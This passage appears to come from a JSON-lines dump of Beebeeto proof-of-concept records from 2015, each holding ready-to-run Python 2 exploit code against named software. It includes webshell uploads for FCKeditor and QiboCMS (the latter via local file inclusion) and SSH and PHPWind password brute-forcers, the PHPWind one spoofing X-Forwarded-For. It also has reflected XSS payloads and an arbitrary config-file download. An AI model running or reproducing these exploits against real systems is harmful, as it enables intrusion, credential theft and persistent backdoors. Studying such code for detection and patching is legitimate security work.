['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul' : {\r\n 'app_name' : 'FCKeditor', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version' : ['<=2.4.3'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'File Upload', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['FCKeditor\u6f0f\u6d1e', 'FCK\u7f16\u8f91\u5668\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e', 'asp', 'php', 'aspx'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'fckeditor <= 2.4.3\u7248\u672c, upload.asp\u6587\u4ef6\u4e3a\u9ed1\u540d\u5355\u8fc7\u6ee4, \u53ef\u7ed5\u8fc7\u4e0a\u4f20', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n host = args['options']['target'] + args['options']['path']\r\n version_number = cls.get_version(host)\r\n\r\n if version_number <= '2.4.3':\r\n args['success'] = True\r\n args['poc_ret']['reason'] = '\u6b64\u7248\u672c\u4e3a' + str(version_number) + '\u7b26\u5408\u6f0f\u6d1e\u5229\u7528'\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n Path = args['options']['path']\r\n host = url + Path\r\n if url.startswith('http://'):\r\n url_noheader = url[7:]\r\n\r\n for script_type in ['asp', 'aspx', 'php']:\r\n if script_type == 'asp':\r\n shell_name = 'css3.cer'\r\n shell_content = '<%eval request(\"Bee\")%>'\r\n path = host + 'editor/filemanager/upload/asp/upload.asp'\r\n elif script_type == 'aspx':\r\n shell_name = 'css3.aspx '\r\n shell_content = '<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Bee\"],\"unsafe\");%>'\r\n path = host + 'editor/filemanager/upload/aspx/upload.aspx'\r\n elif script_type == 'php':\r\n shell_name = 'css3.php '\r\n path = host + 'editor/filemanager/upload/php/upload.php'\r\n shell_content = '<?php eval($_POST[Bee]) ?>'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n s.connect((url_noheader, 80))\r\n s.settimeout(8)\r\n\r\n payload = '-----------------------------20537215486483\\r\\n'\r\n payload += 'Content-Disposition: form-data; name=\"NewFile\"; filename=\"%s\"\\r\\n' % (shell_name)\r\n payload += 'Content-Type: image/jpeg\\r\\n\\r\\n'\r\n payload += 'GIF89a\\r\\n'\r\n payload +='%s\\r\\n\\r\\n\\r\\n' % (shell_content)\r\n payload += '-----------------------------20537215486483--\\r\\n'\r\n payload_length = len(payload)\r\n\r\n packet = 'POST ' + path + ' HTTP/1.1\\r\\n'\r\n packet += 'HOST: ' + url_noheader + '\\r\\n'\r\n packet += 'Connection: Close\\r\\n'\r\n packet += 'Content-Type: multipart/form-data; boundary=---------------------------20537215486483\\r\\n'\r\n packet += 'Content-Length: %d' % payload_length+'\\r\\n'\r\n packet += '\\r\\n'\r\n packet = packet + payload\r\n\r\n s.send(packet)\r\n data = ''\r\n while True:\r\n buf = s.recv(1024)\r\n if not buf:\r\n break\r\n data += buf\r\n s.close()\r\n re_shellurl = re.compile('OnUploadCompleted\\(.+\\)')\r\n shellurl = re_shellurl.findall(data)[0]\r\n shellurl = re.findall('../(\\w.+?)\"', shellurl)\r\n if len(shellurl) > 0:\r\n break\r\n if len(shellurl)>0:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url + '/' + shellurl[0]\r\n return args\r\n else:\r\n args['success'] = False\r\n print '[-]Sorry i faild with Old version exp --- <<' + script_type + '>>'\r\n return args\r\n\r\n @classmethod\r\n def get_version(cls, fck_url):\r\n try:\r\n url_dic = dict()\r\n version_url = fck_url + '/editor/dialog/fck_about.html'\r\n print version_url\r\n version_resp = urllib2.urlopen(version_url).read()\r\n re_version = re.compile('<b>(\\d\\.\\d[\\.\\d]*).{0,10}<\\/b>')\r\n parr = re_version.findall(version_resp)\r\n print '[+]The fck version is %s'%parr[0]\r\n return parr[0]\r\n except:\r\n return '8.8.8'\r\n\r\n def _init_user_parser(self):\r\n self.user_parser.add_option('-p', '--path',\r\n action = 'store', dest = 'path', default = None, help = 'please input the FCKEditor Path !')\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "fckeditor <= 2.4.3\u7248\u672c, upload.asp\u6587\u4ef6\u4e3a\u9ed1\u540d\u5355\u8fc7\u6ee4, \u53ef\u7ed5\u8fc7\u4e0a\u4f20", "app_name": "FCKeditor", "id": "poc-2015-0031", "layer4_protocol": null}
{"create_date": "2015-02-04 11:57:39", "name": "Websitebaker CMS v2.8.3 Reflecting XSS vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u585e\u4e07\u94c1\u725b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Websitebaker CMS,XSS\u6f0f\u6d1e,modify.php?page_id=1,CVE-2015-0553", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0028',\r\n 'name': 'Websitebaker CMS v2.8.3 Reflecting XSS vulnerability POC',\r\n 'author': '\u585e\u4e07\u94c1\u725b',\r\n 'create_date': '2015-01-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Websitebaker CMS',\r\n 'vul_version': ['v2.8.3'],\r\n 'type': 'Cross-Site Scripting',\r\n 'tag': ['Websitebaker CMS', 'XSS\u6f0f\u6d1e', 'modify.php?page_id=1', 'CVE-2015-0553'],\r\n 'desc': '''\r\n \u9690\u85cf\u8868\u5355\u4e2d\u5f15\u53d1\u7684\u53cd\u5c04XSS\u6f0f\u6d1e\r\n ''',\r\n 'references': ['http://packetstormsecurity.com/files/130008/CMS-Websitebaker-2.8.3-SP3-Cross-Site-Scripting.html',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/admin/pages/modify.php?page_id=1%22><script>alert(%27XSS%27)</script><!--'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"XSS\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u9690\u85cf\u8868\u5355\u4e2d\u5f15\u53d1\u7684\u53cd\u5c04XSS\u6f0f\u6d1e", "app_name": "Other", "id": "poc-2015-0028", "layer4_protocol": null}
{"create_date": "2015-02-01 01:36:42", "name": "QiboCMS V5.0 /hr/listperson.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "WenR0", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "Qibocms\u6f0f\u6d1e,Qibo getshell\u6f0f\u6d1e,/hr/listperson.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urlparse\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0024', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'QiboCMS V5.0 /hr/listperson.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC & Exploit', # \u540d\u79f0\r\n 'author': 'WenR0', # \u4f5c\u8005\r\n 'create_date': '2015-01-31', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Qibocms', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['v5.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Local File Inclusion', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Qibocms\u6f0f\u6d1e', 'Qibo getshell\u6f0f\u6d1e', '/hr/listperson.php', 'php'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Qibocms /hr/listperson.php \u7cfb\u7edf\u6587\u4ef6\u5305\u542b\u81f4\u65e0\u9650\u5236Getshell', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2015-081470', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 'FidTpl[list]=../images/default/default.js'\r\n file_path = \"/hr/listperson.php?%s\" % payload\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n html = requests.get(verify_url).content\r\n if 'var evt = (evt) ? evt : ((window.event) ? window.event : \"\");' in html:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n # \u4e0a\u4f20\u6587\u4ef6 upload file\r\n upload_file_url = '%s/hy/choose_pic.php' % args['options']['target']\r\n gif_file = {'postfile': ('test.gif', 'Gif89a <?php echo(md5(\"bb2\"));@eval($_POST[\"bb2\"]);', 'image/gif')}\r\n gif_data = {'action': 'upload'}\r\n upload_content = requests.post(upload_file_url, files=gif_file, data=gif_data).content\r\n # \u83b7\u53d6\u6587\u4ef6\u7684\u5730\u5740 get file url\r\n pic_reg = re.compile(r\"\"\"set_choooooooooooosed\\('\\d+','(.*)','.*'\\);\"\"\")\r\n pic_file = pic_reg.findall(upload_content)\r\n pic_file = urlparse.urlparse((pic_file[0])[:-4]).path\r\n # \u6587\u4ef6\u5305\u542b is include?\r\n file_path = \"/hr/listperson.php?FidTpl[list]=../%s\" % pic_file\r\n webshell = '%s%s' % (args['options']['target'], file_path)\r\n # \u9a8c\u8bc1\u662f\u5426\u6210\u529f check\r\n page_content = requests.get(webshell).content\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in page_content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = webshell\r\n args['poc_ret']['post_password'] = 'bb2'\r\n return args\r\n return args\r\n \r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Qibocms /hr/listperson.php \u7cfb\u7edf\u6587\u4ef6\u5305\u542b\u81f4\u65e0\u9650\u5236Getshell", "app_name": "qibocms", "id": "poc-2015-0024", "layer4_protocol": null}
{"create_date": "2015-01-29 19:06:02", "name": "SSH Brute (\u66b4\u529b\u7834\u89e3\u5bc6\u7801) POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u66b4\u529b\u7834\u89e3", "tag": "SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177,SSH Brute,SSH\u5bc6\u7801\u7206\u7834", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urlparse\r\nimport paramiko\r\n\r\nimport SETTINGS\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0022',\r\n 'name': 'SSH Brute (\u66b4\u529b\u7834\u89e3\u5bc6\u7801) POC',\r\n 'author': '1024',\r\n 'create_date': '2015-01-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'ssh',\r\n 'port': [22],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ssh',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177', 'SSH Brute', 'SSH\u5bc6\u7801\u7206\u7834'],\r\n 'desc': '\u52a0\u8f7d\u5b57\u5178\u66b4\u529b\u7834\u89e3SSH\u5bc6\u7801',\r\n 'references': ['http://www.beebeeto.com',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n if not url.startswith(('http://', 'https://')):\r\n url = 'http://%s' % url\r\n target = urlparse.urlparse(url).netloc\r\n domain_user = target.split('.')[-2]\r\n # Using Beebeeto-framework /utils password_list\r\n password_list = open('%s/utils/payload/password_top100' % SETTINGS.FRAMEWORK_DIR)\r\n user_list = ['root', 'test', 'admin', domain_user]\r\n for pwd in password_list.readlines():\r\n for user in user_list:\r\n if args['options']['verbose']:\r\n print '[*] Content host: ' + target\r\n print '[+] User/Password: %s/%s' % (user, pwd)\r\n client = paramiko.SSHClient()\r\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n try:\r\n client.connect(target, 22, username=user, password=pwd.strip(), timeout=8)\r\n stdin, stdout, stderr = client.exec_command('uname -a')\r\n args['success'] = True\r\n args['poc_ret']['ssh_target'] = target\r\n args['poc_ret']['ssh_user'] = user\r\n args['poc_ret']['ssh_passwd'] = pwd.strip()\r\n args['poc_ret']['ssh_uname'] = stdout.read()\r\n client.close()\r\n return args\r\n except Exception, e:\r\n client.close()\r\n if str(e) == 'Authentication failed.':\r\n print '[-] Fail: %s\\n\\n' % e\r\n continue\r\n else:\r\n args['success'] = False\r\n args['exception'] = 'Failed to connect host/port.'\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u52a0\u8f7d\u5b57\u5178\u66b4\u529b\u7834\u89e3SSH\u5bc6\u7801", "app_name": "Linux", "id": "poc-2015-0022", "layer4_protocol": null}
{"create_date": "2015-01-29 17:46:36", "name": "Exponent CMS 2.3.2 /exponent/index.php Reflected XSS Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u585e\u4e07\u94c1\u725b", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Exponent CMS\u6f0f\u6d1e,XSS\u6f0f\u6d1e,index.php?controller=search&src=,CVE-2015-1177", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0021',\r\n 'name': 'Exponent CMS 2.3.2 /exponent/index.php Reflected XSS Vulnerability POC',\r\n 'author': '\u585e\u4e07\u94c1\u725b',\r\n 'create_date': '2015-01-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Exponent CMS',\r\n 'vul_version': ['2.3.2'],\r\n 'type': 'Cross-Site Scripting',\r\n 'tag': ['Exponent CMS\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'index.php?controller=search&src=','CVE-2015-1177'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.securityfocus.com/bid/59887/',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/exponent/index.php?controller=search&src=f324e%22><script>alert(1)</script>9cbae6bf552&action=search&search_string=test&int=%0d'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(1)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0021", "layer4_protocol": null}
{"create_date": "2015-01-28 14:14:37", "name": "QiboCMS V7 /do/job.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "xiao8bs", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Qibo\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/do/job.php,filedown,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2015-0020',\r\n 'name': 'QiboCMS V7 /do/job.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'xiao8bs',\r\n 'create_date': '2015-01-28',\r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'Qibo',\r\n 'vul_version': ['V7',], \r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Qibo\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/do/job.php', 'filedown', 'php'],\r\n 'desc': 'Qibo V7 has File down in do/job.php.',\r\n 'references': ['N/A', \r\n ], \r\n }, \r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 'job=download&url=ZGF0YS9jb25maWcucGg8'\r\n verify_url = args['options']['target'] + '/do/job.php?%s' % payload\r\n request = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n response = urllib2.urlopen(request)\r\n reg = re.compile(\"webdb\\['mymd5'\\]\")\r\n if reg.findall(response.read()):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n \r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Qibo V7 has File down in do/job.php.", "app_name": "qibocms", "id": "poc-2015-0020", "layer4_protocol": null}
{"create_date": "2015-01-25 21:49:15", "name": "PHPWIND v9.0 X-Forwarded-For IP\u9650\u5236\u7ed5\u8fc7\u5bfc\u81f4\u53ef\u88ab\u7206\u7834\u5bc6\u7801\u6f0f\u6d1e Exploit", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "PHPWIND IP\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e,PHPWIND\u66b4\u529b\u7834\u89e3\u6f0f\u6d1e,X-Forwarded-For,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport random\r\nimport requests\r\nimport urlparse\r\n\r\nimport SETTINGS\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0017',\r\n 'name': 'PHPWIND V9.0 X-Forwarded-For IP\u9650\u5236\u7ed5\u8fc7\u5bfc\u81f4\u53ef\u88ab\u7206\u7834\u5bc6\u7801\u6f0f\u6d1e Exploit',\r\n 'author': 'user1018',\r\n 'create_date': '2015-01-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Other',\r\n 'tag': ['PHPWIND IP\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e', 'PHPWIND\u66b4\u529b\u7834\u89e3\u6f0f\u6d1e', 'X-Forwarded-For', 'php'],\r\n 'desc': 'PHPWIND v9.0 /admin.php or /windid/admin.php IP\u4fee\u6539XFF\u7ed5\u8fc7\u767b\u5f55\u9650\u5236\u6f0f\u6d1e\u3002',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @staticmethod\r\n def get_login_info(url, args):\r\n \"\"\"\r\n 1. Obtain the url without verification code.\r\n 2. Obtain the csrf_token.\r\n \"\"\"\r\n try:\r\n windid_ver_check, admin_ver_check = 1, 1 # Verification code\r\n csrf_token_re = re.compile(r'<input type=\"hidden\" name=\"csrf_token\" value=\"(.*)\"/></form>')\r\n windid_url = '%s/windid/admin.php' % url\r\n windid_req = requests.get(windid_url)\r\n windid_content = windid_req.content\r\n if windid_req.status_code == 200:\r\n if 'id=\"J_admin_name\" required name=\"username\"' in windid_content:\r\n if 'name=\"code\" placeholder=\"\u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801\"' not in windid_content:\r\n windid_ver_check = 0\r\n try:\r\n csrf_token = csrf_token_re.findall(windid_content)[0]\r\n except:\r\n args['success'] = False\r\n return args\r\n else:\r\n windid_ver_check = 1\r\n\r\n admin_url = '%s/admin.php' % url\r\n admin_req = requests.get(admin_url)\r\n admin_content = admin_req.content\r\n if admin_req.status_code == 200:\r\n if 'id=\"J_admin_name\" required name=\"username\"' in admin_content:\r\n if 'name=\"code\" placeholder=\"\u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801\"' not in admin_content:\r\n admin_ver_check = 0\r\n try:\r\n csrf_token = csrf_token_re.findall(admin_content)[0]\r\n except:\r\n args['success'] = False\r\n return args\r\n else:\r\n admin_ver_check = 1\r\n except:\r\n args['success'] = False\r\n return args\r\n\r\n if windid_ver_check == 0:\r\n return windid_url, csrf_token\r\n elif admin_ver_check == 0:\r\n return admin_url, csrf_token\r\n return None, None\r\n\r\n\r\n @staticmethod\r\n def get_username(url, args):\r\n verify_url = '%s/index.php?m=space&uid=1' % url\r\n homepage = requests.get(verify_url).content\r\n user_re = re.compile(r'class=\"message J_qlogin_trigger J_send_msg_pop\" data-name=\"(.*)\"><em></em>')\r\n try:\r\n username = user_re.findall(homepage)[0]\r\n except:\r\n username = 'admin'\r\n return username\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n password_list = open('%s/utils/payload/password_top1000' % SETTINGS.FRAMEWORK_DIR, 'r')\r\n for pwd in password_list.readlines():\r\n url = args['options']['target']\r\n ver_url, csrf_token = cls.get_login_info(url, args)\r\n ip = str(random.randint(1,244))+\".\"+str(random.randint(100,244))+\".\"+str(random.randint(100,244))+\".\"+str(random.randint(100,244))\r\n headers_fake = {\"Host\": urlparse.urlparse(url).netloc,\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\",\r\n \"X-Forwarded-For\": ip,\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection': 'keep-alive'}\r\n\r\n if ver_url and csrf_token:\r\n # Obtain username\r\n username = cls.get_username(url, args)\r\n # Brute func\r\n headers_fake['Cookie'] = 'csrf_token=%s' % csrf_token\r\n payload = 'username=%s&password=%s&submit=&csrf_token=%s' % (username, pwd.split()[0], csrf_token)\r\n if args['options']['verbose']:\r\n print '[*] POST Username: %s' % username\r\n print '[*] POST Password: %s' % pwd.split()[0]\r\n print '[*] POST Payload: %s\\n' % payload\r\n try:\r\n req_content = requests.post('%s?a=login'%ver_url, data=payload, headers=headers_fake).content\r\n except:\r\n continue\r\n if 'admin.php?a=logout\" class=' in req_content:\r\n args['success'] = True\r\n args['poc_ret']['login_url'] = ver_url\r\n args['poc_ret']['username'] = username\r\n args['poc_ret']['password'] = pwd.split()[0]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PHPWIND v9.0 /admin.php or /windid/admin.php IP\u4fee\u6539XFF\u7ed5\u8fc7\u767b\u5f55\u9650\u5236\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2015-0017", "layer4_protocol": null}
{"create_date": "2015-01-20 11:32:40", "name": "Elasticsearch 9200\u7aef\u53e3 \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Elasticsearch\u6f0f\u6d1e,\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0014',\r\n 'name': 'Elasticsearch 9200\u7aef\u53e3 \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-01-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Elasticsearch\u6f0f\u6d1e', '\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': '\u9ed8\u8ba4\u60c5\u51b5\uff0cElasticsearch\u5f00\u542f\u540e\u4f1a\u76d1\u542c9200\u7aef\u53e3\u53ef\u4ee5\u5728\u672a\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u8bbf\u95ee\uff0c\u4ece\u800c\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f',\r\n 'references': ['',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target = urlparse.urlparse(args['options']['target'])\r\n verify_url = 